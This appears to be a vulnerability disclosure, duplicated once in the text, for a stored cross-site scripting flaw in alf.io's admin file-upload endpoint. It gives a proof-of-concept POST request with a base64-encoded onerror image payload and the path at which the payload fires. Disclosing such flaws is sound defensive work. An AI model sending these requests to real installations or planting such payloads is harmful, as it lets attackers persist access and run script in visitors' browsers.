Summary
An administrator on the alf.io application is able to upload HTML files that trigger JavaScript payloads.
Details
An administrator on the alf.io application is able to upload HTML files that trigger JavaScript payloads.
PoC
An admin can make the following POST request to /admin/api/file/upload
.
The data looks as follows.
{"file":"PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmRvbWFpbik+",
"type":"text/html",
"name":"ANYTHING"}
The file key holds <img src=x onerror=alert(document.domain)>
base64 encoded.
Now, upon visiting /file/9e35e10c75a7817ebd66d4345b99a05eeb5ef5810a11acb22303d704aa4595c0
, the payload triggers.
Impact
An attacker gaining administrative access to the alf.io application may be able to persist access by planting an XSS payload.
Summary
An administrator on the alf.io application is able to upload HTML files that trigger JavaScript payloads.
Details
An administrator on the alf.io application is able to upload HTML files that trigger JavaScript payloads.
PoC
An admin can make the following POST request to
/admin/api/file/upload
.The data looks as follows.
The file key holds
<img src=x onerror=alert(document.domain)>
base64 encoded.Now, upon visiting
/file/9e35e10c75a7817ebd66d4345b99a05eeb5ef5810a11acb22303d704aa4595c0
, the payload triggers.Impact
An attacker gaining administrative access to the alf.io application may be able to persist access by planting an XSS payload.